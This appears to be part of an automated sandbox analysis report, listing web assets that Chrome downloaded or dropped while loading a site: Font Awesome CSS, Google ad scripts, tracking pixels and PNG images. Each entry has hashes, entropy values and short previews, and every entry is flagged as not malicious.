                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_hm=MDVlN1hfNU5DZi1NS21pWE5zb2padw%3D%3D&google_nid=appier&google_push=AXcoOmR2IIZ4YsJVk04DJ3sEPljXl30nAB4FlfRKyEf975C_OU0tRWlILbg5ukscQ3zYNZHgvptm4LircZoI5foX6UAGpQqLXFsCIw
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 600 x 314, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):3360
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.6743461321785915
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:4JFCnqNZnERobhNaSgjXxFF14fCOLfcNCV8J1D1:sCqbnS4Nkt1BAFVWf
                                                                                                                                                                                                                                                                                                                      MD5:406843D17B7D22C28CCD59A5D4F2C8F2
                                                                                                                                                                                                                                                                                                                      SHA1:664B0283F3C8FF53F568992C9C4168A687C6FF23
                                                                                                                                                                                                                                                                                                                      SHA-256:9E4848C58442739631BAC6B708A30BD9A7F642C6BAAB8172D608B1403EACC482
                                                                                                                                                                                                                                                                                                                      SHA-512:4A2671F00DF1913237FF728CF6147FFC2DE03FB1E1B7E20555B7F7A461775B48D919E47B44D5FE03EED5AF4BB5B6A7D85D02EDAF460F23F0452BF43B0AF0CF8F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/12987000312419448604/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...X...:......l."....PLTE....p..o.....o...........(o.W..r..p........u..m....5.........q......./z.....X.....s..k..k..m..c..I..i..L..r..i..V.....e..X..u..v....o..._..p..]..........8s....t....{......S....$\.....d....d....2h....Q..A.....T...]..Ly.0j..*..{..H.?..i....|.....9.g..]..@{.j......E..Y.I....IDATx....[....am. a."aH..a...RHB.RHIJ.6.v...#..`dlC..>7).5..~3.K.0......................................................................................................................g.>i.._cM....A`.;e.0...*#..[.2.E<.....F...`!..........-.....a...;.\>,..<.+...h..]c.|c.....V?...OG....sjW.|g,...O..{W.o7..:..Fn,..{.h.qZ>.....M....,.u.o.#...e.............F3.J.t...f..........zTb?.|...q..;q{2...V.....:..........5...nX...T..7A=.f...fm3.Q.Z.mY..?...rE.....-...d$G..05.v........Z..nxsSu..omyV..`....}h..p...(.......#.to_8.6.......?.......v..*nm?v.....92..<>2,7..S.,.S.=..y......O\.1CO....7..L.d@V..{.8.......T.\.T{..g.ui.)M.%........{..-x.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.286735414643417
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
                                                                                                                                                                                                                                                                                                                      MD5:AB304529064B2C30C88FC41AD81913E0
                                                                                                                                                                                                                                                                                                                      SHA1:14091E21A049D97B052DD56FF4076898F6F7D0CC
                                                                                                                                                                                                                                                                                                                      SHA-256:88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
                                                                                                                                                                                                                                                                                                                      SHA-512:6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")||"unknown";a=`https://${a}/pagead/gen_204?id=jca
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 1200, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):6633
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.943099581411173
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:YEjw2sjYKw1WIL2KMLgIk6AtTxgA6/e46arFDRlgj2P6uXfi1yMjCFEiHA:XsjUIC0N0Zox6WFDRGj2P66eTiHA
                                                                                                                                                                                                                                                                                                                      MD5:E78B7BD4E07BFD2389ECB0C9BAF2D9C4
                                                                                                                                                                                                                                                                                                                      SHA1:6EB12C9E3555267C211970C13B81C83718E0ABDE
                                                                                                                                                                                                                                                                                                                      SHA-256:E4EF38A672DA0D57953164EE7D4BFD38E1C26789432C0A82B365AB16966CDAEB
                                                                                                                                                                                                                                                                                                                      SHA-512:E175747221715C2F9F72F630BE044C836BE1D3063F8CF712BA6403BD4173BCDE7ED0950834F10BA46CEB8FC8E9ACDFE55620DC0A9C8376E274F9DF59E99E6949
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...............C.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTEQ+..........xZ...]:.cA....r....T/......hG.......]9...y\..........iH....R,.w...._<......~b....V2......mM.....{....`=....d..........nN.............i....Y4......rS....S-......cA...l....Y5......sU.........n.....|......gF....n....[7.........p......k.R-.......^;...._<.lL.vX.d..........}.U0..............eC.....T..j......Z6....rT...i..........a?.........V1....tU....{^.....................eD.......pP....W2.}`.....s.....x..jI.tV.......X3.h...a>.....~....kK..........wY...[7.....o...nO.b@......oP.|_...u..pQ.f....\8......uW....lK...r.....|...w.fE...qR.....g...jJ........{_.....t.....z...........wZ.q.........y.......hF....y[.}a....z].dB..L`....bKGD.f.|d....tIME......)-u......IDATx......u...gHRn.I..A@QT.%....$...jec.(...h."..x#...eu]tM1W..M.T.....,[..2..l.u....5.pD.{:....}>..|...y...3.=gR.........
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 600 x 314, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):12704
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.940138947736875
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:S0SLNpV4j/EFBFYKDBttiwzbzX9nio92AN:AtW8FjtzzbL9iqF
                                                                                                                                                                                                                                                                                                                      MD5:2D1055984E8C78EDDA088AB44B229469
                                                                                                                                                                                                                                                                                                                      SHA1:7A8405751CCDD9BF68143E1C52ECD1BE5DC84275
                                                                                                                                                                                                                                                                                                                      SHA-256:BFA18BE2B49E5A3A6C6F96754A2024F6D6536CAB05EE58EEBF473D09FE24C29D
                                                                                                                                                                                                                                                                                                                      SHA-512:D70E6875E9DED81295DCE58D0ED66859130D7E65645E8F93CB685BD08FF508D53B6C722B9421871D77BED90E1F359B37446404494062266D609C2E25022B6E28
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/9601954757734677083/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...X...:......l."....PLTE.l.....k..m.....j.....h.....f.....l..a..e..j..m..^.By..H~.Cwl........P........]..S..Ez.T..N..a.....G.~......_..W..\........O..Bw............v....'y.C..m....&c.%].[..........'v.X..Xw.Ah.|....(q....Br.~..[..k.......X..'X....B....|..y..l.....V..}..Zz....... .IDATx..}......4.F..../!q.BBJ.Z..............,3..+$}...~.!l^$..s.M./.8.....|..b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p..bi.........#.J......&Z%.~\..^..@`."9b_wBC.Kh#V.wB.e....5...V;EZ.ET............*4&....pR..@.....M.%~3..C.zv.xAP.J hA.. 8}V3.Zb.Y..*....... ....P.|..273.....# V.....</..........k........Z...$.b.n.u2m.-..=..W..!..i..X....B......._..uR..r._.Tu.o.n@.*.#W}....Y...kS.....W.u@........|^.V}........v.+P...7D .....K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (53751)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):55046
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.749770380617164
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:jLCOJQlBSkHifn5zBc6q2JH0aFdST3BgKxbb1p:x8qzRqYsTp1p
                                                                                                                                                                                                                                                                                                                      MD5:8AB9CF4FA237449BD1F1271F003392BF
                                                                                                                                                                                                                                                                                                                      SHA1:EF424F4EE8416D18B985DA975E2F1E364639CD7A
                                                                                                                                                                                                                                                                                                                      SHA-256:C8A165693096954C937CD385433D2F2D63D5F4CD7A1CD6F3BEB418B6350304EA
                                                                                                                                                                                                                                                                                                                      SHA-512:D70BD3E068BA6CFEB2199B3B46C6EF75EA47D9D42AB14B1037A2AA492F1B493C720FB22B445703C119C0DC8DEDAF81B8AC20F4B3B62CCFE6F4081AC6201F83B5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function b(u){return u}var d=function(u,R,Q,g,B,O,N,Z,m,C,w,S){for(C=(w=12,g);;)try{if(w==79)break;else if(w==71)w=y.console?41:27;else if(w==u)C=g,w=71;else if(w==41)y.console[O](S.message),w=27;else{if(w==76)return Z;if(w==Q)C=52,Z=m.createPolicy(N,{createHTML:T,createScript:T,createScriptURL:T}),w=27;else{if(w==27)return C=g,Z;w==R?w=m&&m.createPolicy?Q:76:w==12&&(m=y.trustedTypes,Z=B,w=R)}}}catch(J){if(C==g)throw J;C==52&&(S=J,w=u)}},T=function(u){return b.call(this,u)},y=this||self;(0,eval)(function(u,R){return(R=d(92,19,40,87,null,"error","bg"))&&u.eval(R.createScript("1"))===1?function(Q){return R.createScript(Q)}:function(Q){return""+Q}}(y)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;ch
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):2296
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861786579524867
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:neDeJeOGHn//x8Vqyyh4nzf6d0t0BQ8KxVqewa3VZwh3d1jm:neked//xOyh4uPBQ8OVjwaPwhtJm
                                                                                                                                                                                                                                                                                                                      MD5:725883252D3798533CB8C934B6020920
                                                                                                                                                                                                                                                                                                                      SHA1:3D18A6941643AF0D235ED99288F6355AB9062342
                                                                                                                                                                                                                                                                                                                      SHA-256:343CAA89482BB66A232AA1AFF556A3948A48ABED7D708A8FA54C09A6ACB83D00
                                                                                                                                                                                                                                                                                                                      SHA-512:3DED5A6ED04BD0EAC8B87F99FA5BA69BF97840B3229EEA41A806CB54106482C8A426915EB1E6962EBA81234A495C5239FE6BF29CC8ED6416EE8D5EA7C2E853F6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/resources/css/projectCard.css
                                                                                                                                                                                                                                                                                                                      Preview:./*@import url("https://fonts.googleapis.com/css2?family=Baloo+2&display=swap");*/......a, a:hover {.. text-decoration: none;.. transition: color 0.3s ease-in-out;..}..../* Cards */...postcard {.. flex-wrap: wrap;.. border: 2px solid white;.. display: flex;.. box-shadow: 0 4px 21px -12px rgba(0, 0, 0, 0.66);.. border-radius: 10px;.. margin: 0 0 2rem 0;.. overflow: hidden;.. position: relative;.. .postcard__img....{.. max-height: 180px;.. width: 100%;.. object-fit: fill;.. position: relative;.. background: inherit;..}.....postcard__img_link {.. display: contents;..}.....postcard__bar {.. width: 50px;.. height: 10px;.. margin: 10px 0;.. border-radius: 5px;.. background-color: #5d2f91;.. transition: width 0.2s ease;..}.....postcard__text {.. padding: 1.5rem;.. position: relative;.. display: flex;.. flex-direction: column;..}.....postcard__preview-txt {.. overflow: hidden;.. text-overflow: ellipsis;..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1560)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1775
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0855295906697
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                                                                                                                                                                                                      MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                                                                                                                                                                                                      SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                                                                                                                                                                                                      SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                                                                                                                                                                                                      SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.286735414643417
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
                                                                                                                                                                                                                                                                                                                      MD5:AB304529064B2C30C88FC41AD81913E0
                                                                                                                                                                                                                                                                                                                      SHA1:14091E21A049D97B052DD56FF4076898F6F7D0CC
                                                                                                                                                                                                                                                                                                                      SHA-256:88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
                                                                                                                                                                                                                                                                                                                      SHA-512:6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/load_preloaded_resource_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")||"unknown";a=`https://${a}/pagead/gen_204?id=jca
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):604
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.573620174038291
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7dkfFQPHl09Kor6EHz1g+WVmObBbBbaLPIpTIiVojx5cF8NonhstcAzhu1:CkEl0nr6EHz1VWV33ePIpTzVojx5p6nH
                                                                                                                                                                                                                                                                                                                      MD5:7BD42E5A35B5FB3FF852D6EA9191CA83
                                                                                                                                                                                                                                                                                                                      SHA1:8A141EB392A05A2DEA3DCD83B97940EF70A81EBC
                                                                                                                                                                                                                                                                                                                      SHA-256:5C4A713EE4250851232BE9F9F68D41586BE39B299528CFC7266E0B0E7E582E1B
                                                                                                                                                                                                                                                                                                                      SHA-512:6FF31ACB937D6944570A837BB77AED92DAE41D71681440DC4765758FC40585F55999F2CDD78C4CE76A5AB414331BA9959BAFCFEF7E85B756AAB899C247F02890
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...0...0.......1....#IDATx...MKTQ...3...K...gP.Eo.Z$..6......"0..."..E-Z...C....+..E.T...JH/.HC.$d...y..."..W...w.3..3..9... ^..Fr4R.Q.....H<...\...V.[...v.L.D...y.wYQ....]....w&...|F...iz8..b.s.r..[.H..5..5D..[@.ed.-...O..=..G..lpD.R.F".J....... .. y*..$>.)V.`..quuP4.W9.}....*..y......~E}.7....IU.~.!.Ak.>....A..o..._.....7.4...{.K..6o.O..5.0n.`..z...V."^. 0.x=..^M...*t...H..9.B.(UD..>heD......."....W..T.E..0D.fYfI..3.-.G".....#.p....q.......Bv..{5.!u.F.i.......[.s.)....I....v.....Y.P.5?...n.'.......;...T......f......Q...~...8.....h.......T3<........IEND.B`.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (608)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):823
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.079251934712805
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                                                                                                                                                                                                      MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                                                                                                                                                                                                      SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                                                                                                                                                                                                      SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                                                                                                                                                                                                      SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):362497
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.804607729377401
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:qG67mT1pcgnsIRKGnol7NOMX9REZW/DeaWChnrlQG6bb6t/wX1xaUImS:bT1JnecZW/hWYQG6b2t/0xalN
                                                                                                                                                                                                                                                                                                                      MD5:3FAAB80E46B71CE8C20DD9AA4715141A
                                                                                                                                                                                                                                                                                                                      SHA1:B2EDC3C44423D0FF09A1106D82EE93B8592C99E8
                                                                                                                                                                                                                                                                                                                      SHA-256:8D5F233F5692D21627EF766AF6A32D7E1A53B1A39D3098F258478BB5B131544F
                                                                                                                                                                                                                                                                                                                      SHA-512:3C1ED23EC47E7FC957E39CE4BD7071E387AB4791A7B99CABB0E356166AC7201E872EC2F2F0B108FDD76C410E95251D355B253D46FC98B3E6D80508144FEB339A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
